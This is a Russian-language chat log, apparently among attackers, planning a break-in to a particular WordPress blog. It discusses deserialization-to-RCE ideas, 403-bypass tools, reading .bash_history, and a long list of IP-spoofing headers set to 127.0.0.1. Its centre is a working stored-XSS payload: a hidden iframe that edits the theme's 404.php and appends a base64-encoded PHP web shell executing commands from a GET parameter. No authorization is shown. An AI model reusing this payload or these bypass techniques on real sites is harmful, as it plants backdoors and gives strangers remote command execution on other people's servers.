это надо будет поресерчить, но была старая атака
1) wp юзает кучу сериализованных объектов и хранит их в базе
2) wp юзает множество вызовов  call_user_func

./wp-includes/class-wp-hook.php:     $value = call_user_func( $the_['function'] );
./wp-includes/class-wp-hook.php:     $value = call_user_func_array( $the_['function'], $args

такого много
был старый вектор через плагины, если сериализовать нужный объект и обратититься к нужному комменту то будет рце - https://www.slideshare.net/phdays/php-wordpress

в данном случае у него было сложнее, по идее тут проще, но нужно найти берет ли ядро вп где-нибудь в качестве аргуметнов что-нибудь подобное после десериалцзии
но может и проще способ есть)

Тут недавно парни выложили в сеть обходняк 403 на xmlrpc
Сам не успел чекнуть, но в новостях увидал сегодня как раз
https://github.com/HACKE-RC/RPCSCAN

@BlackDiver ну и еще я накину конечно)) а с GET на wp-admin пробовал менять на BLABLABLA /wp-admin
?

На запись есть доступ?
Если развернуть локально тот же WP и креды админа "вписать" в базу

а толку, доступа в админку нет

А, точно)

.bash_history может что интересное хранит в хомяке

Там глушняк...(((((

Ша попробую))))

еще конечно оч наркомански, но точно сработает )) засунуть такой пэйлоад на страницы, достал из своих старых заметок

iframe name='evilframe' src='/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentythirteen' // создаём iframe с редактированием шаблона страницы 404 текущей темы (twentythirteen)
style='display:none'  //  делаем iframe невидимым
onload= // как только загрузился
if (evilframe.document.getElementById('newcontent').value.indexOf('system') == -1) // проверяем, что шаблон темы уже не содержит backdoor (вызов функции system)
evilframe.document.getElementById('newcontent').value += atob('PD9waHAgQHN5c3RlbSgkX0dFVFsnY21kJ10pOyA/Pg=='// добавляем к текущему значению темы код <?php @system($_GET['cmd']); ?>
evilframe.document.getElementById('submit').click() // сохраняем тему

и ждать админа х)

Если б outfile был..

короч, нашел сейчас место где вызывается коллбэк так, прямо явным образом, но в плагине
те стрельнуло бы

правда я это рыщу в инсталяции @i_bo0om )))

поэтому если его блог ломаешь могу дать место в базе где заменить

Кстати ещё по 403
https://github.com/whitespots/forbid-bypasser/blob/master/check.py

@BlackDiver рыскал по всей базе двумя вещами:
1) callback
2) s:1 / s:2 / s:3
по имени уже смотрел сорцы

Попробовать хедеры проверить еще, может 403 можно будет обойти

Другие сайты/виртуальные хосты на айпи

К примеру -
CACHE_INFO: 127.0.0.1
CF_CONNECTING_IP: 127.0.0.1
CLIENT_IP: 127.0.0.1
COMING_FROM: 127.0.0.1
CONNECT_VIA_IP: 127.0.0.1
FORWARDED-FOR-IP: 127.0.0.1
FORWARDED-FOR: 127.0.0.1
FORWARDED: 127.0.0.1
FORWARDED_FOR: 127.0.0.1
FORWARDED_FOR_IP: 127.0.0.1
HTTP-CLIENT-IP: 127.0.0.1
HTTP-FORWARDED-FOR-IP: 127.0.0.1
HTTP-PC-REMOTE-ADDR: 127.0.0.1
HTTP-PROXY-CONNECTION: 127.0.0.1
HTTP-VIA: 127.0.0.1
HTTP-X-FORWARDED-FOR-IP: 127.0.0.1
HTTP-X-IMFORWARDS: 127.0.0.1
HTTP-XROXY-CONNECTION: 127.0.0.1
PC_REMOTE_ADDR: 127.0.0.1
PRAGMA: 127.0.0.1
PROXY: 127.0.0.1
PROXY_AUTHORIZATION: 127.0.0.1
PROXY_CONNECTION: 127.0.0.1
REMOTE_ADDR: 127.0.0.1
VIA: 127.0.0.1
X_CLUSTER_CLIENT_IP: 127.0.0.1
X_COMING_FROM: 127.0.0.1
X_DELEGATE_REMOTE_HOST: 127.0.0.1
X_FORWARDED: 127.0.0.1
X_FORWARDED_FOR: 127.0.0.1
X_FORWARDED_FOR_IP: 127.0.0.1
X_IMFORWARDS: 127.0.0.1
X_LOCKING: 127.0.0.1
X_LOOKING: 127.0.0.1
X_REAL_IP: 127.0.0.1
XONNECTION: 127.0.0.1
XPROXY: 127.0.0.1
XROXY_CONNECTION: 127.0.0.1
ZCACHE_CONTROL: 127.0.0.1

да надо через сам вп проломится!